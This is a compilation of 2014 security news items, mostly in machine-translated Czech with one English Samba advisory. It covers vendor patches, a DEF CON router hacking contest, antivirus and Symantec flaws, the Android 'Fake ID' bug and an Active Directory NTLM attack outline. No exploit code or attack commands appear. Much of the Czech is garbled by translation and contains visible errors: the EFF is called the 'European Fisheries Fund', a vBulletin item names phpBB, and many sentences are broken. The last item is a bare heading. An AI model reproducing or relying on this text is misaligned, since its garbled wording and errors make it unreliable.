Tento měsíc aktualizace měla odlišný IE pocit k nim s jinou kumulativní aktualizace záplatování 26 zabezpečení v aplikaci Microsoft vlajkové lodi prohlížeči, včetně veřejně oznámenou chybu zabezpečení, která je pravděpodobné, že se využívá ve volné přírodě. Všech 26 zranitelností byly hodnoceny rozhodující a může být vzdáleně zneužít.

Aktualizace přišla v patách oznámení na začátku měsíce pro upozornění uživatele, že Microsoft by za 18 měsíců, již nepodporují starší verzi prohlížeče. S vyrážka s nulovými dnů a vysokým profilem využije zaměřených na starší verze IE, například 6, 7 a 8, Microsoft dal jasně najevo, že uživatelé by měli používat pouze aktuální prohlížeč s moderní paměť využívat snižující závažnost rizika postavena v roce.

Microsoft také oznámil, že bude blokovat starší ovládací prvky ActiveX v aplikaci Internet Explorer , počínaje prošlé verzí Javy, další platformy silně zaměřen hackery.

Další plánované Patch Tuesday bulletinů zabezpečení vydání je stanoven na 9 září.


Apple Safari záplaty libovolný spuštění kódu zranitelnost
25.8.2014 Zranitelnosti
Apple vydal nové verze svého prohlížeče Safari - 6.1.6 a 7.0.6 - ve kterém pevné vícenásobné problémy s poškozením paměti v Webkit.

Ze sedmi různých CVE-ID, pět chyb byly nalezeny v domě a další dva byly připsány na anonymní výzkumník a týmu Google Chrome bezpečnosti. Vytvořením webové stránky se škodlivým kódem, mohl by útočník způsobit, Spuštění libovolného kódu nebo odmítnutí služby (poškození paměti a aplikace, havárie) v počítači klienta. seznam souvisejícího CVE-ID:

CVE-2014-1384
CVE-2014-1385
CVE-2014-1386
CVE-2014-1387
CVE-2014-1388
CVE-2014-1389
CVE-2014-1390.


15 nových chyb využívané při DEF CON router hackerské soutěže
25.8.2014 Zranitelnosti
Bezpečnostní výzkumníci, kteří se podílejí na SOHOpelessly Broken hackerské soutěži na letošním ročníku DEF CON prokázaly 15 nedostatky, které ovlivňují množství malých office / home office směrovačů.

Pořádá nezávislé hodnotitele bezpečnosti a Evropského rybářského fondu, soutěž se skládala ze dvou skladeb (a improvizované navíc na druhém). V první soutěžící byli vyzváni, aby prokázat dříve neidentifikované zabezpečení v bezdrátových směrovačů off-the-shelf spotřebitelů a veřejně provádět útoky s využitím nich. Ve druhé, a capture-the-flag stylu soutěže, soutěžící byli za úkol převzít 10 off-the-shelf SOHO routery, kalená, ale se známými zranitelnosti. Z deseti ASUS RT-AC66U, Belkin N900 DB, Netgear WNDR4700 Centria, TRENDnet TEW-812DRU, byly zcela ohrožena, spolu s router Actiontec Electronics, která se obvykle vydávají zákazníkům Verizon Communications ", a který byl předložen jeden z těchto soutěžících. Linksys EA6500, Netgear WNR3500U / WNR3500L, TP-LINK TL-WR1043ND D-Link DIR-865L a EFF je Otevřete okno nástroje Wireless Router Firmware byl jeden neúspěšně zaútočil, nebo nebyla napadena vůbec. zero-day zranitelnost trať viděl čtyři soutěžící, které prokazují, 15 zranitelností, jedenáct z nich bylo hlášené Tripwire výzkumník Craig Young, který dříve pracoval na testování populárních bezdrátových směrovačů a zjistil, že 80% z amazonských top 25 nejprodávanějších SOHO modely bezdrátových směrovačů sportovní chyby zabezpečení. Předchozí výzkum nezávislých bezpečnostních Hodnotitelé také zjistil , že mnoho směrovačů od různých a populárních výrobců mají jednu nebo více kritické chyby zabezpečení, které umožňují místní a vzdálené útočníky . převzít kontrolu nad zařízením a použít jej k fázi útoků Podle Lucian Constantin , pouze čtyři z hlášených zranitelností byly vlastně nové - zbytek byly dříve objeveny, a oprava ze strany výrobce, ale pouze na jiných modelech routerů. To je přesně to, Tento bezstarostný postoj dodavatelů a výrobců, že soutěž zaměřená zářit světlo na. Svou roli také doufám, že tyto výsledky budou podnítí uživatele a technology, aby naléhala na výrobce, aby zvýšily svou hru.


Microsoft opravuje 37 zranitelností
25.8.2014 Zranitelnosti
Microsoft chce zjevně všichni setřást psí dny léta a věnovat pozornost záplatování. Předběžné oznámení tento měsíc obsahuje devět návěstí pokrývajících spektrum produktů MSFT. Máme všudypřítomné Internet Explorer všechny podporované verze patche (MS14-051), se stejným pravděpodobné upozorněním, že by to platit pro systém Windows XP také, pokud společnost Microsoft nadále podporuje ji. Tato oprava řeší jediným zranitelnost být aktivně využíván v přírodě od v tomto měsíci sklizně otázek, CVE-2014-2817 a jediný problém, který je známo, že být zveřejněny, ale není známo, že by v rámci aktivního využívání, CVE-2014 -2819. Oba z nich jsou zvýšení otázek výsad. MS14-043 je také kritický a dálkové problém spuštění kódu. To se týká pouze Professional / konečné / Enterprise systému Windows 7 a 8 / 8,1 a "Media Center TV Pack" pro Windows Vista. Naštěstí, nebo ne, záleží na úhlu pohledu, to není pravda, vzdálený, ale ještě spíše k dalšímu útoku, kde musí být uživatel nucen k otevření škodlivého souboru. Také poznámky, MS SQL Server, všechny podporované verze jsou náchylné k problém, který je Denial of Service na většině platforem, ale je důležité, zvýšení úrovně oprávnění problému na serveru 2014 a 2012 x64, je to pravděpodobně není rozhodující, protože to bude vyžadovat určitý stupeň ověřování využívat, ale vzhledem k potenciálu, který se stane v libovolném počtu okolností, to bude nepochybně důležitou otázkou pro administrátory řešení. Kromě těch, které mají pestrou směsici 3 dalších EOPs, vzdálené spuštění kódu a dvě otázky bezpečnostní spojka, všechny označené Důležité. Windows, Office, Sharepoint a NET jsou dotýká těchto oprav. Bezpečnost a IT týmy budou mít co dělat míchat testovat a aplikovat tyto opravy. Autor: Ross Barrett, Senior Manager, bezpečnostní inženýrství, Rapid7.


Disqus WordPress plugin zranitelnosti
25.8.2014 Zranitelnosti
Během penetračního testování pro klienta, Australan založil nezávislý bezpečnostní konzultant Nik Cubrilovic, objevili několik bezpečnostních otázkách v rámci velmi populární Disqus WordPress plugin. Zatím plugin byl stažen téměř 1,5 milionu časy z oficiální Wordpress plugin úložiště.

Prvním problémem je cross-site žádost padělání v souboru Manage.php. Cubrilovic konstatuje, že parametry disqus_replace, disqus_public_key a disqus_secret_key jsou předány funkci update_option WordPress přímo bez filtrace. Zneužití této chyby zabezpečení vyžaduje tvorbě škodlivých stránek a sociální inženýrství správce na něj klikněte. Druhá chyba je trochu méně závažné. Kvůli chybné kontroly, žádost cross-site padělání může být použita ke spuštění obnovení nebo odstranění funkcí komentář systému Disqus. To by mohlo mít za následek smazaných komentářů. Poslední otázkou souvisí s parametrem kroku, který je uložen jako nefiltrované, a mohou být použity v cross site scripting útoku. Tyto chyby byly záplatované v nejnovější verzi Disqus - 2.7.6 propuštěn na 24.června. Protože jeho zjevnou odpovědné politiky zpřístupňování informací, pan Cubrilovic právě vydala podrobnosti teď dělat dost jistý čas, který uplynul od doby vydání pevné Disqus Wordpress plugin. Autor: Berislav Kucan, provozní ředitel Help Net Security.


Symantec problémy aktualizace upevnění Endpoint Protection zero-day
14.8.2014 Zranitelnosti
Společnost Symantec vydala aktualizace pro jeho řešení Endpoint Protection pro připevnění zero-day eskalaci oprávnění zranitelnosti nedávno objevené výzkumníky Offensive Security. "Problém, jak je uvedeno, vliv na aplikace a zařízení Ovládací prvek aplikace Symantec Endpoint Protection. Tuto chybu zabezpečení není přístupný na dálku a má vliv pouze na klienty září skutečně běžící aplikace a ovládací zařízení, "společnost je vysvětleno v aktualizace poradenství . "Pokud zranitelnost je využívána přístupu k počítači přímo, mohlo by to mít za následek havárii klienta, odepření služby, nebo v případě úspěchu , eskalovat na oprávnění správce a získat kontrolu nad počítačem, "říkají, a poznamenal, že si nejsou vědomi případů zneužití této chyby zabezpečení. Rovněž poznamenal, že chybu nelze zneužít vzdáleně, ale Offensive Security zveřejněny kód zneužití, nebezpečí je velmi reálné. zranitelnost postihuje všechny verze klientů Symantec Endpoint Protection 11.x a 12.x běžící aplikace a ovládací zařízení, a uživatelé se doporučuje provést aktualizaci na 12.1 RU4 MP1b. Aplikace Symantec Endpoint Protection Small Business Edition 12.0 je také ovlivněna, a uživatelé mohou odstranit nebezpečí aktualizací na nejnovější dostupné sestavení září 12,1 Small Business Edition, která není dotčena. Další podrobnosti o bezpečnostní slabosti, stejně jako snižující závažnost rizika (v případě, že aktualizace nelze aplikovat okamžitě) naleznete zde . Symantec očekává se, že řešení nalezené v jeho řešení Endpoint Protection včas ostatní nulové dny. Offensive Security sdílí informace o některých zjištěných zranitelností s CERT, ale jiní byli studoval v Advanced Windows vykořisťování (AWE) samozřejmě společnosti na Black Hat 2014 konferenci tento týden.


Exploit je k dispozici pro aplikaci Symantec End Point ochraně

7.8.2014 Zranitelnosti

Využití není k dispozici na exploitů db.com pro Symantec End Point ochrany eskalaci práv zranitelnosti. Symantec vydala opravu tohoto problému na začátku tohoto týdne. [1]

Tato chyba zabezpečení vyžaduje přístup normální uživatele do postiženého systému a lze jej použít k zvýšení oprávnění plně ovládat systém (namísto omezení na konkrétního uživatele), takže to bude velký navazuje využít standardní drive-by zneužít získá uživatelská práva.

Získali jsme několik zpráv, že uživatelé mají potíže s instalací náplast na starších systémech (například Windows 2003). Aplikace náplasti jen selže v těchto případech, a zdá se, že nemá negativní vliv na stabilitu systému.

[1] http://www.symantec.com/business/support/index?page=content&id=TECH223338


Bezpečnostní experti zjistili, že antiviry jsou děravé jak řešeto

3.3.2014 Zranitelnosti
Na bezpečnostní konferenci SyScan 360, v rámci které jsme informovali například o částečném hacknutí elektromobilu Tesla Model S, se objevila i podrobná přednáška bezpečnostního experta Joxean Koretze společnosti Coseinc.

Jak si můžete prohlédnout v podrobné přednášce, cílem výzkumu bylo zjistit rizika samotných antivirových programů, které sice mají sloužit ke zvýšení bezpečnosti, ale samo o sobě jsou značnou potenciální dírou do systému.

Jak Koretze upozornil, každý program, který do operačního systému nainstalujeme, zvyšuje riziko kvůli tomu, že poskytuje zase další prostor, který může případný útočník a malware využít. V případě antivirů je situace o to nebezpečnější, protože mají k dispozici vyšší či nejvyšší práva, bez kterých by na druhou stranu zase nemohly vykonávat činnost v podobě skenování, úprav nebo mazání souborů.V rámci výzkumu se podařilo nalézt zneužitelné chyby v antivirech od společností jako Avast, Bitdefender, Avira, AVG, Comodo, ClamAV, DrWeb, ESET, F-Prot, F-Secure, Panda nebo eScan. Celkem se podařilo nalézt chyby v přibližně 17 různých antivirech. A dle vyjádření se nelze ničemu divit. Tyto programy píší lidé stejně jako jakýkoli jiný software a chybám se tak nelze nikdy zcela vyhnout. Většina antivirů například používá pro aktualizaci nezabezpečené spojení HTTP, což umožňuje případnému útočníkovu využít techniku „Man in the middle“ a získat tak pomocí antiviru přístup k celému počítači.

Nalezené chyby už například společnosti Avast nebo Eset opravily, v případě ostatních to zatím není potvrzené. Jak prozradil šéf AV-Test, která se zabývá testováním antivirů, osobně nevidí příliš velký problém s chybami v antivirech a spoléhá na statistiku. Pro případného útočníku je vždy výhodnější využít chyby v rozšířených aplikacích jako je Java, Adobe Reader/Flash a podobně, které se nachází takřka na každém počítači. Antivirových řešení je velké množství a potenciální trh v rámci jednoho typu tak není příliš lákavý.


All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon

2.8.2014 Zranitelnosti

A remote code execution in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10. ( assgined CVE-2014-3560) and a patch has been release by the team at samba.org.

Here's the details from http://www.samba.org/samba/security/CVE-2014-3560


===========
Description
===========

All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon.

A malicious browser can send packets that may overwrite the heap ofthe target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root).

==================
Patch Availability
==================

A patch addressing this defect has been posted to

http://www.samba.org/samba/security/

Additionally, Samba 4.1.11 and 4.0.21 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.

==========
Workaround
==========

Do not run nmbd, the NetBIOS name services daemon.


40% z orgs systémem VMware stále náchylné k Heartbleed
2.8.2014 Zranitelnosti
Uplynulo více než tři měsíce od objevu OpenSSL Heartbleed chyby , a mnoho systémy jsou stále zranitelné.

Podle údajů shromážděných analytických údajů firmy CloudPhysics, více než polovina nasazených VMware vCenter serverů (57%) a ESXi hypervisor počítačů (58%) postižených vady jsou stále unpatched. VMware odvedl dobrou práci tlačí ven aktualizací zabezpečení pro své výrobky (včetně výše uvedených), že fixní zranitelnost ve dvou týdnech po objevení, takže problém zde jsou správci virtuálních datových center. "I spekulovat, že IT týmy jsou laxní o záplatování ESXi, protože tyto stroje jsou obvykle za firewall a není snadné se dostat z vnějšího světa, " poznamenal Irfan Ahmad, spoluzakladatel a CTO v CloudPhysics. "Nicméně, že laxnost neznamená, že zpoždění v záplatování dobrý nápad. Za prvé, zasvěcených útoky nadále hlavním zdrojem porušování. Dalším aspektem je, že pokud nebudou útočníci podaří infiltrovat malou oprávnění služby uvnitř brány firewall, jste právě jim dal volnou ruku k útoku na vaše nejcitlivější data. " Všichni ve všech, jejich data říká, že vysoká 40 procent organizací ve své celosvětové uživatelské základny mají alespoň jednu vCenter server nebo ESXi hostitele, který je stále zranitelné. "Mnozí bezpečnostní experti předpovídali, že by to mohlo trvat měsíce až roky, aby konečně zbavit Heartbleed. Bohužel, alespoň pro VMware infrastruktury, to se zdá být pravda, "říká, jako rychlost záplatování je neustále zpomaluje.


Internet Explorer zranitelnosti zvyšuje na 100%
2.8.2014 Zranitelnosti

Brómu Labs analyzovány veřejné zranitelnosti a využije z prvních šesti měsících roku 2014. Výzkumu zjistila, že zranitelnost Internet Explorer zvýšil více než 100 procent od roku 2013, překonal Java a Flash zranitelnosti.

Vědci zjistí, že: Hackeři stále více zaměřují Internet Explorer - Analýza ukazuje, že zranitelnost Microsoft Internet Explorer se zvýšily více než 100 procent od roku 2013, trend podtrhlo postupně kratší dobu do prvního patche pro jeho posledních dvou vydáních. Veřejné JAVA nulovými dny úpadku - V roce 2013, Java vedl mezi zranitelností a veřejné využije, ale tento trend se obrátil v roce 2014 ve skutečnosti, v prvních šesti měsících roku 2014, tam nebyl jediný veřejný JAVA využít.. Action Script Spray řídí zero-day útoky - Oba Internet Explorer a Flash zero-day útoky zadlužuje Action Script spreje, rodící techniku, která obchází adresu rozložení prostoru randomizace (ASLR) s programem zpětného orientované (ROP) řetězce. "Koncoví uživatelé i nadále prvořadým úkolem pro zabezpečení informací profesionály, protože jsou nejvíce cílené a nejvíce náchylné k útokům "řekl Rahul Kashyap, hlavní bezpečnostní architekt, brómu. "Webové prohlížeče byly vždy oblíbenou alej útoku, ale nyní vidíme, že hackeři jsou nejen stále lepší v útoku Internet Explorer, dělají to častěji." Úplná zpráva je k dispozici zde.


Apple potvrzuje iOS zadní vrátka, výzkumník říká, že vysvětlení je zavádějící
2.8.2014 Zranitelnosti
V návaznosti na zjištění nelegálních funkcí v iOS společnosti Apple, které mohou sloužit jako zadní vrátka, společnost změnila v článku znalostní báze vyjmenovat a vysvětlit tři sporné služby nalezené iOS forenzní expert Jonathan Zdziarski.

Pcapd nástroj, to je vysvětleno, "podporuje diagnostické zachycení paketů ze zařízení se systémem iOS na důvěryhodné počítače," a je používán pro "řešení problémů a diagnostiku problémů s aplikací na zařízení, stejně jako připojení k podnikové VPN." file_relay služba je také používá pro diagnostiku a Apple strojírenství kvalifikovat konfigurace zákazníků. "Tato služba je oddělený od uživatelských generované zálohy, nemá přístup ke všem datům v přístroji, a respektuje iOS ochranu dat," tvrdí. Konečně, house_arrest "se používá iTunes pro přenos dokumentů do az přístroje se systémem iOS pro aplikace, které podporují tuto funkci, "stejně jako při vývoji aplikace pro přenos údajů ze zkoušek. Zdziarski komentoval na to tím, že je problém s pcapd je, že lze aktivovat na libovolném zařízení bezdrátově, bez vědomí uživatele nebo povolení, a může, proto být použit pro snooping třetími osobami v privilegované postavení. "Apple je, že je zcela zavádějící tím, že prohlásí, že soubor relé je pouze pro kopírování diagnostických dat. Pokud by diagnostických dat, máte na mysli kompletní album uživatele, jejich SMS, poznámky , Address Book, Geolocation dat, screenshoty poslední věc, kterou se při pohledu na, a tuny dalších osobních údajů - tak určitě ... ale tato data je příliš osobní povahy, které mají být někdy potřebné pro diagnostiku, "dodal. také on poukázal na to, že znovu, uživatel nikdy požádal o povolení k výpisu všech těchto údajů, nebo oznámeny v žádném případě. Službu je možné použít bezdrátově, a to také nerespektuje záložní šifrování daného zařízení, říká. Říká se, že ano, iTunes a Xcode použít house_arrest službu, ale to může být také použit pro přístup k citlivé informace app, včetně soukromého rozhovory a OAuth žetony. "To není zadní dveře, spíše privilegovaný přístup, který je k dispozici zde, že opravdu není nutné, aby se tam (nebo alespoň by mohl být navržen jinak)," podotkl. Ujistil se, poznamenat, že on nemá nárok že tato zadní vrátka byly tam dal úmyslně na příkaz NSA nebo jiných orgánů. "Co dělá starost mě je, že Apple se zdá být zcela zavádějící o některých z nich (zejména soubor relé), a ne řešit problémy jsem vznesené na ostatní, "poznamenal a dodal, že doufá, že společnost bude tiše opravit mnohé z nich v budoucích verzích mobilního operačního systému. "Bylo by nezodpovědné divoce na Apple, aby řešení těchto otázek, a to zejména nyní, že veřejnost ví o nich," dodal.


Symantec Endpoint Protection Privilege eskalace Zero Day
31.7.2014
Zranitelnosti

Lidé na Offensive Security oznámila, že v průběhu testu penetrace pro jednoho ze svých zákazníků, oni našli několik chyb zabezpečení v aplikaci Symantec Endpoint Protection produktu. I když údaje jsou omezené, je zranitelnost jeví umožnit zvýšení úrovně oprávnění pro uživatele systému, který by poskytl prakticky neomezený přístup k systému. Offensive Security zveřejnil video ukazující využití jednoho z zranitelnosti .

Symantec uvedl, že jsou si vědomi zranitelnosti a vyšetřování.

Tam je nějaká ironie v tom, že existuje Zero Day zranitelnosti v softwaru, který velká část uživatelů počítat chránit svůj počítač před škodlivým softwarem a softwarové zranitelnosti. Faktem je, že vývoj software je těžké, a dokonce i bezpečnostní software není imunní vůči využitelných zranitelností. Pokud je jasná strana, zdá se, že tam nejsou žádné využije v přírodě a přesto, že je zapotřebí lokální přístup k zařízení, aby tyto chyby zabezpečení zneužít.


Android několik let obsahuje závažnou zranitelnost

31.7.2014 Zranitelnosti
Většina zařízení s operačním systémem Google Android je náchylná k průniku do systému, díky kterému se útočníci mohou dostat k platební historii, e-mailům a dalším citlivým datům.

Tato nebezpečná chyba je v Androidu podle expertů ze společnosti Bluebox Security přítomna již od vydání verze 2.1 na počátku roku 2010. Analytici jí přezdívají Fake ID, jelikož, podobně jako třeba falešný občanský průkaz napomáhá mladistvým při koupi alkoholu, toto slabé místo umožňuje nebezpečným aplikacím přístup ke speciálním funkcím Androidu, jež jsou normálně zapovězeny. Vývojáři z Googlu v uplynulých letech představili změny, které omezují některé z možných škod, jež mohou tyto nebezpečné aplikace napáchat. Klíčová zranitelnost je v systému však stále (a to i v testovací verzi chystaného Android L).

Chyba Fake ID zneužívá selhání Androidu při ověřování platnosti kryptografických certifikátů, které doprovázejí každou aplikaci nainstalovanou v zařízení. Operační systém se spoléhá na údaje při rozdělování speciálních oprávnění, která umožňují několika aplikacím fungovat mimo sandbox Androidu. Za normálních okolností sandbox zamezuje aplikacím, aby přistupovaly k datům, jež patří jiným aplikacím, nebo k citlivým částem systému. Vybrané aplikace typu Adobe Flash či Google Wallet však mohou fungovat i mimo sandbox. Podle Jeffa Forristala z Bluebox Security selhává Android při ověřování řetězce certifikátů, které se využívají k ověření toho, zda aplikace patří mezi privilegované aplikace s rozšířenými právy.
 

V důsledku toho může škodlivá aplikace obsahovat neplatný certifikát, který bude tvrdit, že jde například o Flash, a Android jí přiřadí ta samá speciální privilegia, jaká by přiřadil legitimní aplikaci – legitimitu certifikátu OS jednoduše nezkoumá. „Pak už jen stačí, aby se koncový uživatel rozhodl nainstalovat falešnou aplikaci, a je prakticky konec hry,“ upozorňuje Forristal. „Trojský kůň ihned pronikne ze sandboxu a začne krást osobní data.“

Změny v Androidu 4.4 omezují některá privilegia, která Android Flashi přiděluje. I tak však podle Forristala selhání při ověření řetězce certifikátů je v Androidu od verze 2.1. „Po prověření celé věci jsme rychle svým partnerům distribuovali opravu a prověřili jsme všechny aplikace v Google Play a nemáme žádné důkazy o tom, že by zneužívání této zranitelnosti aktivně probíhalo,“ uvedl mluvčí Googlu v reakci na nařčení experty z Bluebox Security. Zatím však není jasné, jakým způsobem Google svou několik let starou chybu opravil či zda jeho partneři již aktualizaci distribuují koncovým uživatelům.


Unpatched OpenSSL otvory nalezené na Siemens IKS
29.7.2014 Zranitelnosti
Počet Siemens průmyslových výrobků bylo zjištěno, sportovní čtyři zranitelnosti v jejich provádění OpenSSL, které by mohly vést k man-in-the-middle (MITM) útoky nebo padání webových serverů výrobků.

Nedostatky lze zneužít vzdáleně, a využije které se zaměřují na tyto chyby OpenSSL jsou veřejně dostupné, US Industrial Control Systems Cyber ​​Emergency Response Team (ISC CERT) varoval ve čtvrtek. Ze šesti dotčených produktů , aktualizace zabezpečení pro záplatování děr jsou k dispozici pouze pro dvě osoby. Do další čtyři obdrží opravu, společnost vydala seznam akcí, zákazníci mohou zaváží ke snížení rizika útoků. "Postižené Siemens průmyslové výrobky jsou určeny pro řízení a kontrolu sítě a monitorování v odvětví kritické infrastruktury, jako jsou chemické , Critical Výroba, energie, potraviny a zemědělství, a vody a odpadní vody, "ISC CERT poznamenal. "Chyby zjištěné mohl pravost, integritu a dostupnost dotčených přístrojů ovlivnit." "Dopad na jednotlivé organizace je závislá na mnoha faktorech, které jsou jedinečné pro každou organizaci," oni si všimli, a dodal, že vlastníci aktiv mohou navíc ochránit své systémy proti obecné kybernetické bezpečnosti rizika podle - pokud je to možné - ujistěte se, že nejsou přístupné z Internetu; tím, že systémy behing firewally a jejich izolace od podnikové sítě; a za použití bezpečných metod pro přístup k nim vzdáleně.


Cisco opravuje kritickou chybu ve modemy a bezdrátové brány
26.7.2014 Zranitelnosti

Cisco má pevnou kritickou zranitelnost postihující řadu svých bezdrátových bytových bran a kabelových modemů, a zkontrolovat, zda jsou jejich poskytovatelé služeb a organizací na podporu třetích stran tlačili ven upgrade software pomocí opravy. Nabádá uživatele Zákazníci bez smlouvy o poskytování služeb by měly požadovat, bezplatné aktualizace prostřednictvím technické pomoci Center Cisco (kontaktní informace naleznete zde ). zranitelnost, která byla oceněna nejvyšší skóre závažnosti, i když neexistuje důkaz, že se v současné době používají v útocích, "by mohla umožnit neověřenému vzdálenému útočníkovi využít přetečení vyrovnávací paměti a způsobit spuštění libovolného kódu. " "zranitelnost je důsledkem nesprávného ověření vstupu pro HTTP požadavků," vysvětlil Cisco v poradenství zveřejněné ve středu. "Útočník by mohl tuto chybu zabezpečení zneužít odesláním požadavku vytvořeného HTTP ovlivněna zařízení. Úspěšné využívání by mohlo útočníkovi pád webový server a spustit libovolný kód se zvýšenými oprávněními. . Tato chyba zabezpečení existuje, zda je zařízení nakonfigurováno v režimu Router nebo v režimu brány " . Neexistuje žádné řešení pro vady - aktualizace softwaru je jediný způsob, jak odstranit riziko, že zranitelnost pózuje Dotčené produkty jsou:

Cisco DPC3212 VoIP kabelový modem
Cisco DPC3825 8x4 DOCSIS 3.0 Wireless Rezidenční brána
Cisco EPC3212 VoIP kabelový modem
Cisco EPC3825 8x4 DOCSIS 3.0 Wireless Rezidenční brána
Cisco Model DPC3010 DOCSIS 3.0 8x4 kabel modemu
Cisco Model DPC3925 8x4 DOCSIS 3.0 s bezdrátovým rezidenční brány s Edva
Cisco Model DPQ3925 8x4 DOCSIS 3.0 Bezdrátové domácí brána s Edva
Cisco Model EPC3010 DOCSIS 3.0 Cable Modem
Cisco Model EPC3925 8x4 DOCSIS 3.0 s bezdrátovým rezidenční brány s Edva.


vBulletin náchylné k SQL injection
24.7.2014 Zranitelnosti

Rumunský hacking komunita objevil a zodpovědně hlášeny kritickou zranitelnost vůči vložení SQL nalezené v nejnovější verzi (5.1.2) oblíbeného webového forum software phpBB.

Chyba by mohla umožnit útočníkovi aplikovat příkaz SQL a dostat své ruce na pověření správce, které by pak umožnily jim přístup k administračním panelu, a proto k databázím obsahujícím informace citlivé uživatele (e-mailové adresy, hesla, atd.). A pokud je povoleno oprávnění k zápisu, by mohly dokonce spustit škodlivý kód. objev vady byla sdílena s vBulletin developerů, kteří ihned začali pracovat na opravu. Podle Softpedia v Ionut Ilaşcu, hacking komunity - Rumunský Security Team - není zájem o zneužívání nebo prodej informací o zranitelnosti, i když by to mohlo pravděpodobně vydělat jim slušné peníze jako vBulletin používají desítky tisíc různých webových stránkách. Zástupce skupiny bylo řečeno, Ilaşcu, že společnost promptně reagovaly na jejich heads-up, a že další verze softwaru bude obsahovat opravu pro problém. Jakmile nová verze je venku, a byl proveden velký počet uživatelů, bude skupina sdílet podrobnosti o zranitelnosti s veřejností.


Oracle poskytuje 113 aktualizací
24.7.2014 Zranitelnosti
Čtvrtletní Critical Patch Aktualizace Oracle (CPU) není nikdy menší akce. V dubnu jsme viděli 104 bezpečnostní otázky řešit, v lednu to bylo 144. Tentokrát jsme se potýkají s 113 aktualizacemi. Tyto aktualizace pokrývají celé portfolio softwaru Oracle, včetně JRE, Solaris, Oracle databáze, MySQL, a četné webové a middleware produktů. co vyčnívá, je opožděné oprava Heartbleed v MySQL Enterprise Server, přichází plně 3 měsíce po Oracle pevně, že problém ve svých ostatních produktů, a vysoce rizikových zranitelností stanovených v Oracle Database a JRE. je to trochu šokující vidět, že horní dvě otázky (CVE-2013-3751 a CVE-2013 - 3774) je stanovené v Oracle Database 12 byly stanoveny před rokem pro Oracle Database 11. To znamená, že Oracle docela pravděpodobné, věděl, že verze 12 byl zranitelný, když vydali ji v červnu loňského roku a opustili své zákazníky vystaveny za uplynulý rok. Starší skvrny v Oracle Fusion Middleware (spojené s CVE-2013 -1741 a další) se zdají být jiný zvíře. To je pravděpodobné, že Oracle s upstream opravy z otevřeného prodejce source (Mozilla v tomto případě) a přerozdělovat je k jejich placení, postižených zákazníků, protože znovu použít postiženou součást. JRE skvrny zabývat 20 různých problémů s mnoha vysoce rizikových zranitelností v každém nejnovějších podporovaných verzí JRE, jak se očekávalo jedná o využitelné prostřednictvím sandboxed aplikací a apletů Java Web Start. V nejhorším z nich by útočník mohl zcela kompromisní cílové systémy tím, že přiměje uživatele k návštěvě škodlivé webové stránky, nebo příliš společného, ​​je ohrožena "normální" webové stránky, které se podává škodlivý obsah. Poslední vylepšení na kontrolu, když prohlížeč může běžet Java pluginy poněkud zmírnil riziko pro ty uživatele, kteří byli pro chov jejich JRE až do dnešního dne a vlastně věnovat pozornost varování a kontroly. To znamená, že je to stále ještě bude velké riziko, a budeme muset monitorovat spolupráci zveřejnění využití kódu z různých systémů zveřejňování informací. JRE opravy bude prioritou záplaty pro téměř všechny domácí a podnikové koncové uživatele. Otázky Oracle databáze bude hlavním tématem pro správce podnikové databáze. Autor: Ross Barrett, Senior Manager, bezpečnostní inženýrství, Rapid7.


Dopady Active Directory vad 95% z Fortune 1000 společností
23.7.2014 Zranitelnosti
Aorato identifikovali novou hrozivou chybu v rámci služby Active Directory, která umožňuje útočníkům změnit heslo oběti, i přes současnou bezpečnosti a identity Ochrana proti krádeži opatření. Se 95% z Fortune 1000 společností používající Active Directory, potenciál pro tento konkrétní zranitelnosti způsobit poškození a odcizení je vysoká. Jakmile útočník využívá této služby Active Directory chybu, pomocí nového hesla, útočník může vydávat za oběť pro přístup k různým podnikům služby a obsah, které vyžadují výslovné použití pověření oběti, jako je Remote Desktop Protocol (RDP), přihlášení a Outlook Web Access (OWA). Bohužel, i přes současné bezpečnostních protokolů, zaznamenány události chybět zásadní údaj o útoku krádeže identity. Útočník může tuto činnost vykonávat bez vědomí protokoly událostí, což Siems log-based a Big Data Security Analytics k ničemu proti těmto druhům pokročilých útoků. vysoké úrovni anatomie útoku útočník využívá veřejně dostupné bezplatné testování penetrace nástroje (např. WCE nebo Mimikatz), který krade komponentu ověřování, jmenoval NTLM hash, ze zařízení na zaměstnance. NTLM hash je umístěn ve výchozím nastavení na všech zařízeních, které se připojují k podnikovým zdrojům. Vzhledem k tomu, součást ověřování je známo, že riziko zabezpečení, které vede ke identity útoky krádeže, přes notoricky známý Pass-the-hash (PTH) útoku, se ochrany byly umístěny aby se zabránilo jejímu zneužití. Například, mnoho podniků se snaží omezit použití Active Directory je starší - a přesto povolen protokol default-ověřování (tj. NTLM). V jiných situacích, podniky log a audit NTLM činnost. Útočník nutí klienta k ověřování služby Active Directory pomocí slabší šifrovací protokol. V této fázi, útočník používá Directory chybu Active, kde šifrovací protokol opírá o NTLM hash. Tato činnost není zaznamenána v systému a třetí strana přihlásí, dokonce i ty, které se specificky přihlásit NTLM činnost. Jako výsledek, žádné výstrahy, nebo forenzní dat, někdy naznačují, že útok se koná. Útočník dokazuje jeho tzv. legitimní identitu Active Directory pomocí protokolu slabší ověřování. V důsledku toho, že útočník je schopen overovat se do vyhrazených služeb a změnit heslo oběti. Útočník využívá změněné heslo plně ukrást identitu oběti a přístup ke všem podnikovým zdrojům oběti. "Miliony podniky jsou slepě důvěřovat Active Directory jako základ k jejich celkové IT infrastruktury. nešťastné Pravdou je, že tato důvěra je naivně ztracená, takže drtivou většinu z Fortune 500 podniků a zaměstnanců náchylných k porušení osobních a firemních dat, "řekl Tal Be'ery, VP Výzkum na Aorato. ". Do podniky na vědomí inherentní rizika spojená s spoléhají na Active Directory a vytvořit strategii pro zmírnění rizika, budeme i nadále vidět útočníky chůzi mimo cenné informace nepozorovaně" Bez vlastní řešení s cílem zmírnit tuto chybu, Aorato doporučuje podniky:

Detekce protokolů ověřování anomálie
Identifikujte útok korelace běžnému použití šifrovacích metod s kontextem, ve kterém se používá identitu oběti
Uplatňovat opatření ke snížení útoku. Všimněte si, že pouze tato opatření snižují útoku a neodstraňují to zcela nebo řešit příčinu.
Pro více technických informací najdete zde .


Google jde do války proti nulové dnů
23.7.2014 Zranitelnosti

